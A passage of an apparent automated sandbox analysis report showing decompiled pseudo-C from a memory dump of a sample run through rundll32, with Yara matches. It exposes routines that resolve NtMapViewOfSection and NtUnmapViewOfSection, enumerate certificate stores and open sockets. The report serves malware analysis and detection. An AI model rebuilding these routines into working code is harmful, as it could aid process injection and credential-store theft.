				intOrPtr _v64;
				long long _v72;
				long long _v80;
				signed long long _v88;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t48;
				void* _t54;
				void* _t59;
				WCHAR* _t61;

				_t59 = _t54;
				 *((long long*)(_t59 + 8)) = __rbx;
				 *((long long*)(_t59 + 0x10)) = __rbp;
				 *(_t59 - 0x28) =  *(_t59 - 0x28) & 0x00000000;
				 *(_t59 + 0x20) =  *(_t59 + 0x20) & 0x00000000;
				 *((intOrPtr*)(_t59 + 0x24)) = 0;
				GetModuleHandleW(_t61);
				GetProcAddress(_t45);
				GetProcAddress(_t48);
				_v48 = 0x40;
				r9d = 0;
				_v56 = _v56 & 0x00000000;
				_v64 = 2;
				_v72 =  &_v40;
				_v80 =  &_a32;
				_v88 = _v88 & 0x00000000;
				 *__rax();
				return  *__rax();
			}
















                                        0x21ef301b9b0
                                        0x21ef301b9b3
                                        0x21ef301b9b7
                                        0x21ef301b9c3
                                        0x21ef301b9cb
                                        0x21ef301b9dc
                                        0x21ef301b9e3
                                        0x21ef301b9f6
                                        0x21ef301ba09
                                        0x21ef301ba0f
                                        0x21ef301ba17
                                        0x21ef301ba1a
                                        0x21ef301ba22
                                        0x21ef301ba2f
                                        0x21ef301ba42
                                        0x21ef301ba4a
                                        0x21ef301ba50
                                        0x21ef301ba6a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: @$NtMapViewOfSection$RtlNtStatusToDosError$ntdll.dll
                                        • API String ID: 667068680-1608534789
                                        • Opcode ID: b2b9b886758cbfbfa2d1ecb312041d743efba4d65bf52864f5adb2240458c07b
                                        • Instruction ID: e5b53ac62abf743907423c7d508b40ad1515387d47b3ce003b8afa6ac5360021
                                        • Opcode Fuzzy Hash: b2b9b886758cbfbfa2d1ecb312041d743efba4d65bf52864f5adb2240458c07b
                                        • Instruction Fuzzy Hash: DB114632214B408AEB109B12F848B9A77E4F39DBA5F568135DE4D83B14EF7DC58ACB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEF950 Relevance: 12.2, APIs: 8, Instructions: 214timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 38%
                                        			E0000021E21EF2FEF950(intOrPtr __edx, void* __ebp, void* __eflags, long long __rbx, long long __rcx, void* __r8, void* __r9) {
				void* __rsi;
				void* __rbp;
				signed int _t85;
				struct _CRITICAL_SECTION* _t117;
				struct _CRITICAL_SECTION* _t142;
				struct _CRITICAL_SECTION* _t147;
				intOrPtr* _t150;
				intOrPtr* _t152;
				struct _CRITICAL_SECTION** _t156;
				intOrPtr _t160;
				struct _CRITICAL_SECTION* _t178;
				struct _CRITICAL_SECTION* _t183;
				long long _t184;
				long _t186;
				void* _t189;
				void* _t190;
				void* _t192;
				void* _t193;
				long _t201;
				LARGE_INTEGER* _t204;
				void* _t206;
				struct _CRITICAL_SECTION* _t208;

				 *((intOrPtr*)(_t192 + 0x10)) = __edx;
				_t190 = _t192 - 0x27;
				_t193 = _t192 - 0xa0;
				 *((long long*)(_t190 - 0x41)) = 0xfffffffe;
				 *((long long*)(_t193 + 0xf0)) = __rbx;
				_t184 = __rcx;
				r13d = 0;
				r15d = 1;
				asm("o16 nop [eax+eax]");
				asm("lock inc esp");
				if (__eflags != 0) goto 0xf2fefae7;
				_t5 = _t184 + 0x60; // 0x61
				 *((long long*)(_t190 + 0x17)) = _t5;
				EnterCriticalSection(_t208);
				 *((char*)(_t190 + 0x1f)) = 1;
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp-0x31], xmm0");
				_t142 =  *(__rcx + 0x90);
				if (_t142 == 0) goto 0xf2fef9f4;
				_t160 =  *((intOrPtr*)(_t190 - 0x29));
				if (_t160 == 0) goto 0xf2fef9d7;
				 *(_t160 + 0x20) = _t142;
				goto 0xf2fef9db;
				 *(_t190 - 0x31) = _t142;
				 *((long long*)(_t190 - 0x29)) =  *(__rcx + 0x98);
				 *(__rcx + 0x90) = _t204;
				 *(__rcx + 0x98) = _t204;
				_t150 =  *((intOrPtr*)(__rcx + 0x88));
				if (_t150 == 0) goto 0xf2fefa16;
				 *((intOrPtr*)( *_t150 + 0x20))();
				if ( *((intOrPtr*)(_t150 + 8)) != 0) goto 0xf2fefa00;
				E0000021E21EF2FEF840( *((intOrPtr*)(_t150 + 8)), __rcx, _t190 - 0x31, _t5, _t190);
				if ( *((long long*)(_t184 + 0x48)) == 0) goto 0xf2fefa8f;
				_t152 =  *((intOrPtr*)(_t184 + 0x88));
				if (_t152 == 0) goto 0xf2fefa8f;
				asm("o16 nop [eax+eax]");
				_t85 =  *((intOrPtr*)( *_t152 + 0x18))();
				if ( *((intOrPtr*)(_t152 + 8)) != 0) goto 0xf2fefa40;
				if (_t85 - 0x11e1a300 >= 0) goto 0xf2fefa8f;
				 *((long long*)(_t190 - 0x49)) =  ~_t85 +  ~_t85 * 4 +  ~_t85 +  ~_t85 * 4;
				 *(_t193 + 0x28) = r13d;
				 *(_t193 + 0x20) = _t204;
				r9d = 0;
				r8d = 0x493e0;
				SetWaitableTimer(_t206, _t204, _t201);
				_t178 =  *(_t190 - 0x31);
				if (_t178 == 0) goto 0xf2fefade;
				_t147 =  *(_t178 + 0x20);
				 *(_t190 - 0x31) = _t147;
				_t168 =  ==  ? _t204 :  *((intOrPtr*)(_t190 - 0x29));
				 *((long long*)(_t190 - 0x29)) =  ==  ? _t204 :  *((intOrPtr*)(_t190 - 0x29));
				 *(_t178 + 0x20) = _t204;
				 *(_t190 - 9) = r13d;
				E0000021E21EF310D880( ==  ? _t204 :  *((intOrPtr*)(_t190 - 0x29)), _t178);
				 *(_t190 - 1) = _t147;
				r9d = 0;
				 *((intOrPtr*)(_t178 + 0x28))();
				if ( *(_t190 - 0x31) != 0) goto 0xf2fefa9b;
				LeaveCriticalSection(_t183);
				 *(_t190 + 0x6f) = r13d;
				 *(_t190 + 0x67) = _t204;
				 *(_t190 + 0x7f) = _t204;
				SetLastError(_t186);
				 *(_t193 + 0x20) =  *(_t184 + 0x40);
				r14d = GetQueuedCompletionStatus(_t189, ??, ??, ??);
				_t117 = GetLastError();
				_t156 =  *(_t190 + 0x7f);
				if (_t156 == 0) goto 0xf2fefb7e;
				E0000021E21EF310D880( *((intOrPtr*)(_t184 + 0x28)), _t190 + 0x6f);
				 *(_t190 - 0x19) = _t117;
				 *(_t190 - 0x11) = _t147;
				if ( *(_t190 + 0x67) != 2) goto 0xf2fefb5d;
				 *(_t190 + 7) = _t156[4];
				 *(_t190 + 0xf) =  *_t156;
				asm("movaps xmm0, [ebp+0x7]");
				asm("movdqa [ebp-0x19], xmm0");
				 *(_t190 + 0x6f) = _t156[5];
				goto 0xf2fefb6c;
				 *_t156 = _t147;
				_t156[4] =  *(_t190 - 0x19);
				_t156[5] =  *(_t190 + 0x6f);
				asm("lock inc esp");
				if (0 == 1) goto 0xf2fefbb2;
				goto 0xf2fef990;
				if (r14d != 0) goto 0xf2fefb90;
				if (_t117 != 0x102) goto 0xf2fefbf7;
				goto 0xf2fef990;
				if ( *(_t190 + 0x67) == 1) goto 0xf2fef990;
				 *(_t184 + 0x38) = r13d;
				asm("lock xadd [edi+0x34], eax");
				if (r13d != 0) goto 0xf2fefbfc;
				goto 0xf2fef990;
				 *((long long*)(_t190 - 0x39)) = _t184;
				r9d =  *(_t190 + 0x6f);
				_t156[0xa]();
				 *(_t190 + 7) = r13d;
				E0000021E21EF310D880(_t184, _t156);
				 *(_t190 + 0xf) = _t147;
				asm("movups xmm0, [ebp+0x7]");
				asm("inc ecx");
				asm("lock xadd [edi+0x30], ecx");
				if (0xffffffff != 1) goto 0xf2fefbf2;
				E0000021E21EF2FEF7D0(_t147, _t156, _t184);
				goto 0xf2fefc3e;
				 *(_t190 + 7) = _t117;
				goto 0xf2fefc2a;
				_t75 = _t184 + 0x38;
				r15d =  *_t75;
				 *_t75 = r15d;
				if (r15d != 0) goto 0xf2fefc26;
				r9d = 0;
				r8d = 0;
				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0xf2fefc26;
				 *(_t190 + 7) = GetLastError();
				goto 0xf2fefc2a;
				 *(_t190 + 7) = r13d;
				E0000021E21EF310D880( *((intOrPtr*)(_t184 + 0x28)), _t156);
				 *(_t190 + 0xf) = _t208;
				asm("movups xmm0, [ebp+0x7]");
				asm("inc ecx");
				return 0;
			}

























                                        0x21ef2fef950
                                        0x21ef2fef95f
                                        0x21ef2fef964
                                        0x21ef2fef96b
                                        0x21ef2fef973
                                        0x21ef2fef97e
                                        0x21ef2fef981
                                        0x21ef2fef984
                                        0x21ef2fef98a
                                        0x21ef2fef993
                                        0x21ef2fef999
                                        0x21ef2fef99f
                                        0x21ef2fef9a3
                                        0x21ef2fef9aa
                                        0x21ef2fef9b0
                                        0x21ef2fef9b4
                                        0x21ef2fef9b7
                                        0x21ef2fef9bc
                                        0x21ef2fef9c6
                                        0x21ef2fef9c8
                                        0x21ef2fef9cf
                                        0x21ef2fef9d1
                                        0x21ef2fef9d5
                                        0x21ef2fef9d7
                                        0x21ef2fef9e2
                                        0x21ef2fef9e6
                                        0x21ef2fef9ed
                                        0x21ef2fef9f4
                                        0x21ef2fef9fe
                                        0x21ef2fefa0a
                                        0x21ef2fefa14
                                        0x21ef2fefa1d
                                        0x21ef2fefa27
                                        0x21ef2fefa2e
                                        0x21ef2fefa38
                                        0x21ef2fefa3a
                                        0x21ef2fefa48
                                        0x21ef2fefa54
                                        0x21ef2fefa5b
                                        0x21ef2fefa69
                                        0x21ef2fefa6d
                                        0x21ef2fefa72
                                        0x21ef2fefa77
                                        0x21ef2fefa7a
                                        0x21ef2fefa88
                                        0x21ef2fefa8f
                                        0x21ef2fefa99
                                        0x21ef2fefa9b
                                        0x21ef2fefa9f
                                        0x21ef2fefaaa
                                        0x21ef2fefaae
                                        0x21ef2fefab2
                                        0x21ef2fefab6
                                        0x21ef2fefaba
                                        0x21ef2fefabf
                                        0x21ef2fefac3
                                        0x21ef2fefacf
                                        0x21ef2fefadc
                                        0x21ef2fefae1
                                        0x21ef2fefae7
                                        0x21ef2fefaeb
                                        0x21ef2fefaef
                                        0x21ef2fefaf5
                                        0x21ef2fefafe
                                        0x21ef2fefb18
                                        0x21ef2fefb21
                                        0x21ef2fefb23
                                        0x21ef2fefb2a
                                        0x21ef2fefb2c
                                        0x21ef2fefb31
                                        0x21ef2fefb34
                                        0x21ef2fefb3d
                                        0x21ef2fefb45
                                        0x21ef2fefb48
                                        0x21ef2fefb4c
                                        0x21ef2fefb50
                                        0x21ef2fefb58
                                        0x21ef2fefb5b
                                        0x21ef2fefb5d
                                        0x21ef2fefb63
                                        0x21ef2fefb69
                                        0x21ef2fefb6e
                                        0x21ef2fefb77
                                        0x21ef2fefb79
                                        0x21ef2fefb81
                                        0x21ef2fefb89
                                        0x21ef2fefb8b
                                        0x21ef2fefb95
                                        0x21ef2fefb9e
                                        0x21ef2fefba4
                                        0x21ef2fefbab
                                        0x21ef2fefbad
                                        0x21ef2fefbb2
                                        0x21ef2fefbb6
                                        0x21ef2fefbc4
                                        0x21ef2fefbc7
                                        0x21ef2fefbcb
                                        0x21ef2fefbd0
                                        0x21ef2fefbd4
                                        0x21ef2fefbd8
                                        0x21ef2fefbe0
                                        0x21ef2fefbe8
                                        0x21ef2fefbed
                                        0x21ef2fefbf5
                                        0x21ef2fefbf7
                                        0x21ef2fefbfa
                                        0x21ef2fefbfc
                                        0x21ef2fefbfc
                                        0x21ef2fefbfc
                                        0x21ef2fefc03
                                        0x21ef2fefc05
                                        0x21ef2fefc08
                                        0x21ef2fefc19
                                        0x21ef2fefc21
                                        0x21ef2fefc24
                                        0x21ef2fefc26
                                        0x21ef2fefc2a
                                        0x21ef2fefc2f
                                        0x21ef2fefc33
                                        0x21ef2fefc37
                                        0x21ef2fefc58

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalErrorLastSection$CompletionEnterInit_thread_footerLeaveQueuedStatusTimerWaitable
                                        • String ID:
                                        • API String ID: 228527383-0
                                        • Opcode ID: 6947ace0cee9fec1c1bfd1419755eabfcfea334807307d32711a9a76499f9b76
                                        • Instruction ID: 52bc9a01765067e6e26a39b67b2399b4d0c01d452f353c8c0d858795ed900e8e
                                        • Opcode Fuzzy Hash: 6947ace0cee9fec1c1bfd1419755eabfcfea334807307d32711a9a76499f9b76
                                        • Instruction Fuzzy Hash: 55A16673611B419AEB15CF25E9443ED33A0F768BA8F058225DE4967F58EF34C5A6C380
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEF1F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 36%
                                        			E0000021E21EF2FEF1F0(signed int __esi, long long __rbx, long long __rcx, long long __rdx, long long __rbp) {
				void* _v24;
				intOrPtr _v180;
				char _v184;
				long long _v200;
				long long _v208;
				void* _v216;
				void* __rdi;
				void* _t43;
				void* _t44;
				long _t45;
				void* _t46;
				void* _t54;
				signed int _t56;
				intOrPtr _t58;
				void* _t59;
				void* _t65;
				long _t82;
				long long _t83;
				longlong _t85;
				void* _t89;
				void* _t92;
				struct _OSVERSIONINFOEXA* _t95;

				_t65 = _t89;
				 *((long long*)(_t65 + 8)) = __rcx;
				_v200 = 0xfffffffe;
				 *((long long*)(_t65 + 0x10)) = __rbx;
				 *((long long*)(_t65 + 0x18)) = __rbp;
				_t58 = r8d;
				_t83 = __rcx;
				 *((long long*)(__rcx)) = 0xf31b16b0;
				r14d = 0;
				 *(__rcx + 8) = _t95;
				 *(__rcx + 0x10) = _t95;
				 *((long long*)(__rcx + 0x18)) = __rdx;
				 *(__rcx + 0x20) = _t95;
				 *((long long*)(__rcx)) = 0xf31b12b8;
				 *((long long*)(__rcx)) = 0xf31b1d78;
				 *(__rcx + 0x28) = _t95;
				 *(__rcx + 0x30) = _t95;
				 *(__rcx + 0x38) = _t95;
				r8d = 0x9c;
				E0000021E21EF310E410(_t46, 0, _t54, _t59,  &_v184, __rdx, __rcx, _t92);
				_v184 = 0x9c;
				_v180 = 6;
				r8b = 3;
				__imp__VerSetConditionMask();
				VerifyVersionInfoA(_t95, _t82, _t85);
				_t56 = __esi | 0xffffffff;
				_t49 =  !=  ? _t56 : 0x1f4;
				 *((intOrPtr*)(_t83 + 0x40)) =  !=  ? _t56 : 0x1f4;
				 *(_t83 + 0x48) = _t95;
				 *(_t83 + 0x50) = _t95;
				 *((intOrPtr*)(_t83 + 0x58)) = r14d;
				_t22 = _t83 + 0x60; // 0x60
				_t44 = E0000021E21EF2FEE990();
				E0000021E21EF310D880(_t22, __rdx);
				_v216 = _t44;
				_v208 = 0xf31b1d78;
				if (_t44 == 0) goto 0xf2fef2e4;
				0xf2fee680();
				 *(_t83 + 0x88) = _t95;
				 *(_t83 + 0x90) = _t95;
				 *(_t83 + 0x98) = _t95;
				 *((intOrPtr*)(_t83 + 0xa0)) = _t58;
				_t57 =  >=  ? _t58 : _t56;
				r9d =  >=  ? _t58 : _t56;
				r8d = 0;
				CreateIoCompletionPort(??, ??, ??, ??);
				 *((long long*)(_t83 + 0x28)) = 0xf31b1d78;
				if (0xf31b1d78 != 0) goto 0xf2fef34b;
				_t45 = GetLastError();
				_t43 = E0000021E21EF310D880( &_v216 | 0xffffffff, "mutex");
				_v216 = _t45;
				_v208 = 0xf31b1d78;
				if (_t45 == 0) goto 0xf2fef34b;
				0xf2fee680();
				return _t43;
			}

























                                        0x21ef2fef1f0
                                        0x21ef2fef1f3
                                        0x21ef2fef202
                                        0x21ef2fef20b
                                        0x21ef2fef20f
                                        0x21ef2fef213
                                        0x21ef2fef216
                                        0x21ef2fef220
                                        0x21ef2fef223
                                        0x21ef2fef226
                                        0x21ef2fef22a
                                        0x21ef2fef22e
                                        0x21ef2fef232
                                        0x21ef2fef23d
                                        0x21ef2fef247
                                        0x21ef2fef24a
                                        0x21ef2fef24e
                                        0x21ef2fef252
                                        0x21ef2fef258
                                        0x21ef2fef263
                                        0x21ef2fef268
                                        0x21ef2fef270
                                        0x21ef2fef278
                                        0x21ef2fef281
                                        0x21ef2fef293
                                        0x21ef2fef29e
                                        0x21ef2fef2a3
                                        0x21ef2fef2a6
                                        0x21ef2fef2a9
                                        0x21ef2fef2ad
                                        0x21ef2fef2b1
                                        0x21ef2fef2b5
                                        0x21ef2fef2be
                                        0x21ef2fef2c0
                                        0x21ef2fef2c5
                                        0x21ef2fef2c9
                                        0x21ef2fef2d0
                                        0x21ef2fef2de
                                        0x21ef2fef2e4
                                        0x21ef2fef2eb
                                        0x21ef2fef2f2
                                        0x21ef2fef2f9
                                        0x21ef2fef301
                                        0x21ef2fef304
                                        0x21ef2fef307
                                        0x21ef2fef310
                                        0x21ef2fef316
                                        0x21ef2fef31d
                                        0x21ef2fef325
                                        0x21ef2fef327
                                        0x21ef2fef32c
                                        0x21ef2fef330
                                        0x21ef2fef337
                                        0x21ef2fef345
                                        0x21ef2fef365

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$CompletionConditionCountCreateCriticalExceptionInfoInit_thread_footerInitializeMaskPortSectionSpinThrowVerifyVersion__std_exception_copy
                                        • String ID: iocp$mutex
                                        • API String ID: 4133264258-1266449624
                                        • Opcode ID: 0f3bd768da0e5ea16eea640437c9dd5bd4120e7c3742766c5626e02ab0ce0fa6
                                        • Instruction ID: 4990b4e04b6ab192c429ccf434b97bcd6401c95aa75349e0fc4a7bb241a834f3
                                        • Opcode Fuzzy Hash: 0f3bd768da0e5ea16eea640437c9dd5bd4120e7c3742766c5626e02ab0ce0fa6
                                        • Instruction Fuzzy Hash: 93417932210B8096EB24CF25E88428A73F4F758764F624329DFA853BA4EF79C567C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302FB90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 80encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cert$Store$CertificatesEnum$CertificateCloseContextFreeOpen
                                        • String ID: Certificate %d$Listing certs for store %s
                                        • API String ID: 598586232-3674431298
                                        • Opcode ID: 9f3355f9253c1a9d0f375a5dbe4cc5038aeee279d3360d4d20c44a1df265f27f
                                        • Instruction ID: ef8ae8719400be1a7f3385bc0181bc0e2ed3176f5a1fd5b5ab6f989b43623493
                                        • Opcode Fuzzy Hash: 9f3355f9253c1a9d0f375a5dbe4cc5038aeee279d3360d4d20c44a1df265f27f
                                        • Instruction Fuzzy Hash: 47218371301B8045EE55AB17AD583DBA6A1ABA9FC0F1A84369D0E07F56EE3CC413C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3018890 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 50COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0000021E21EF3018890(signed int __edx, void* __eflags, void* __rcx) {
				void* _v72;
				signed char _t8;
				signed int _t10;

				_t10 = __edx & 0x00000017;
				 *(__rcx + 0x10) = _t10;
				_t8 =  *(__rcx + 0x14) & _t10;
				if (__eflags == 0) goto 0xf30188b5;
				if (r8b != 0) goto 0xf30188ba;
				if ((_t8 & 0x00000004) != 0) goto 0xf30188c4;
				if ((_t8 & 0x00000002) != 0) goto 0xf30188ef;
				goto 0xf301891a;
				return _t8;
			}






                                        0x21ef3018897
                                        0x21ef301889a
                                        0x21ef301889d
                                        0x21ef301889f
                                        0x21ef30188a4
                                        0x21ef30188ad
                                        0x21ef30188b1
                                        0x21ef30188b3
                                        0x21ef30188b9

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow
                                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                        • API String ID: 432778473-1866435925
                                        • Opcode ID: e2f2f8f4cb01b9a1532ecc18cf1df01b357efa897e85c791b1842b17e1414af0
                                        • Instruction ID: 9d5baa3a45008d461a11b5819297ab40aa4f5c02c085f0a6f515d7554cd83da3
                                        • Opcode Fuzzy Hash: e2f2f8f4cb01b9a1532ecc18cf1df01b357efa897e85c791b1842b17e1414af0
                                        • Instruction Fuzzy Hash: 9D11603122154592FE54BB14DC59BDF23A1FBB0744F864413AD4A0BCABEE6CCA07C780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301BA6C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 29libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: NtUnmapViewOfSection$RtlNtStatusToDosError$ntdll.dll
                                        • API String ID: 667068680-3998908438
                                        • Opcode ID: 6f9dc40e55cc84c4bcad7d28686e4125d510a5ef1c01b7f2f6dba7ddb1910b07
                                        • Instruction ID: 033fac6c5f0a036075b3bc244c69a1b3263d5c526e07620d431f2c8034a4c106
                                        • Opcode Fuzzy Hash: 6f9dc40e55cc84c4bcad7d28686e4125d510a5ef1c01b7f2f6dba7ddb1910b07
                                        • Instruction Fuzzy Hash: 66F0F471705A4185EE04EB12FC5819AA7B0BBA9FD0F498036AE4E47B29EE3CD496C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FF3F50 Relevance: 9.1, APIs: 6, Instructions: 135networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$Init_thread_footerSocket
                                        • String ID:
                                        • API String ID: 3979501240-0
                                        • Opcode ID: ddb4365dd0928ee9723c442f63b07f9436e9a0590a6810949821ec7c1c7811ca
                                        • Instruction ID: 195ec58af3b9b85db95d91d4b23e52eedd86d1ae982e6179df20ee4a767abb9b
                                        • Opcode Fuzzy Hash: ddb4365dd0928ee9723c442f63b07f9436e9a0590a6810949821ec7c1c7811ca
                                        • Instruction Fuzzy Hash: 90516E32A14B918AEB108F74EC492DD27B0F365768F029315DF6912EDADB78D1D6C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF301B230 Relevance: 9.1, APIs: 6, Instructions: 124fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateErrorHandleLastModuleNamePointerRead
                                        • String ID:
                                        • API String ID: 1442449144-0
                                        • Opcode ID: 37b822aaf9dc0f329d9b56b3dd7b6b678b972d3cfd7c9e27a8f7042b5c71e470
                                        • Instruction ID: e6a62df36e66dd01c978a74c3e0875b0bd879498cc67a1413c5b90b447ff61ac
                                        • Opcode Fuzzy Hash: 37b822aaf9dc0f329d9b56b3dd7b6b678b972d3cfd7c9e27a8f7042b5c71e470
                                        • Instruction Fuzzy Hash: A841033260065147EF60AB55AD087EFA3A5BB64BD0F469221DE4803FC6EF7CC81AC784
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FF3000 Relevance: 9.1, APIs: 6, Instructions: 98networkCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 24%
                                        			E0000021E21EF2FF3000(intOrPtr __eax, void* __ebx, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, void* __r8, intOrPtr* __r9, intOrPtr _a8, long long _a16, long long _a24, char _a32) {
				long long _v32;
				intOrPtr _v40;
				long long _v56;
				intOrPtr _t26;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t40;
				intOrPtr _t41;
				long long _t52;
				long long _t53;
				void* _t77;

				_t52 = __rax;
				_a16 = __rbx;
				_a24 = __rsi;
				_t77 = __rcx;
				if (__rcx != 0xffffffff) goto 0xf2ff3030;
				_v40 = 0x2719;
				goto 0xf2ff306c;
				__imp__#112();
				r8d = __ebx;
				_t64 = __rdx;
				_t60 = __rcx;
				__imp__#4();
				_t40 = __eax;
				_t26 = E0000021E21EF310D880(__rcx, __rdx);
				__imp__#111();
				_v32 = _t52;
				_v40 = _t26;
				asm("movups xmm0, [ebp-0x10]");
				asm("movups [esi], xmm0");
				if (_t40 != 0) goto 0xf2ff307c;
				_v40 = _t40;
				E0000021E21EF310D880(_t60, __rdx);
				_v32 = _t52;
				asm("movups xmm0, [ebp-0x10]");
				asm("movups [esi], xmm0");
				E0000021E21EF310D880(_t60, __rdx);
				if ( *((intOrPtr*)(__r9 + 8)) != _t52) goto 0xf2ff308f;
				if ( *__r9 == 0x2734) goto 0xf2ff30aa;
				E0000021E21EF310D880(_t60, __rdx);
				if ( *((intOrPtr*)(__r9 + 8)) != _t52) goto 0xf2ff315a;
				if ( *__r9 != 0x2733) goto 0xf2ff315a;
				if (E0000021E21EF2FF3780(__ebx, _t52, _t52, _t77, __r9) < 0) goto 0xf2ff315a;
				_a8 = 0;
				if (_t77 != 0xffffffff) goto 0xf2ff30d8;
				_v40 = 0x2719;
				_t31 = E0000021E21EF310D880(_t77, _t64);
				goto 0xf2ff314f;
				__imp__#112();
				_t53 =  &_a32;
				_a32 = 4;
				_v56 = _t53;
				r8d = 0x1007;
				__imp__#7();
				_t41 = _t31;
				_t32 = E0000021E21EF310D880(_t77, _t64);
				__imp__#111();
				_v32 = _t53;
				_v40 = _t32;
				asm("movups xmm0, [ebp-0x10]");
				asm("movups [esi], xmm0");
				if (_t41 != 0) goto 0xf2ff313f;
				_v40 = _t41;
				E0000021E21EF310D880(_t77, _t64);
				_v32 = _t53;
				asm("movups xmm0, [ebp-0x10]");
				asm("movups [esi], xmm0");
				goto 0xf2ff3144;
				if (_t41 == 0xffffffff) goto 0xf2ff315a;
				_t34 = E0000021E21EF310D880(_t77, _t64);
				_v40 = _a8;
				_v32 = _t53;
				asm("movups xmm0, [ebp-0x10]");
				asm("movups [esi], xmm0");
				return _t34;
			}















                                        0x21ef2ff3000
                                        0x21ef2ff3000
                                        0x21ef2ff3005
                                        0x21ef2ff301e
                                        0x21ef2ff3025
                                        0x21ef2ff3027
                                        0x21ef2ff302e
                                        0x21ef2ff3032
                                        0x21ef2ff3038
                                        0x21ef2ff303b
                                        0x21ef2ff303e
                                        0x21ef2ff3041
                                        0x21ef2ff3047
                                        0x21ef2ff3049
                                        0x21ef2ff3051
                                        0x21ef2ff3057
                                        0x21ef2ff305b
                                        0x21ef2ff305e
                                        0x21ef2ff3062
                                        0x21ef2ff3067
                                        0x21ef2ff3069
                                        0x21ef2ff306c
                                        0x21ef2ff3071
                                        0x21ef2ff3075
                                        0x21ef2ff3079
                                        0x21ef2ff307c
                                        0x21ef2ff3085
                                        0x21ef2ff308d
                                        0x21ef2ff308f
                                        0x21ef2ff3098
                                        0x21ef2ff30a4
                                        0x21ef2ff30b7
                                        0x21ef2ff30bd
                                        0x21ef2ff30c8
                                        0x21ef2ff30ca
                                        0x21ef2ff30d1
                                        0x21ef2ff30d6
                                        0x21ef2ff30da
                                        0x21ef2ff30e0
                                        0x21ef2ff30e4
                                        0x21ef2ff30ef
                                        0x21ef2ff30f9
                                        0x21ef2ff3102
                                        0x21ef2ff3108
                                        0x21ef2ff310a
                                        0x21ef2ff3112
                                        0x21ef2ff3118
                                        0x21ef2ff311c
                                        0x21ef2ff311f
                                        0x21ef2ff3123
                                        0x21ef2ff3128
                                        0x21ef2ff312a
                                        0x21ef2ff312d
                                        0x21ef2ff3132
                                        0x21ef2ff3136
                                        0x21ef2ff313a
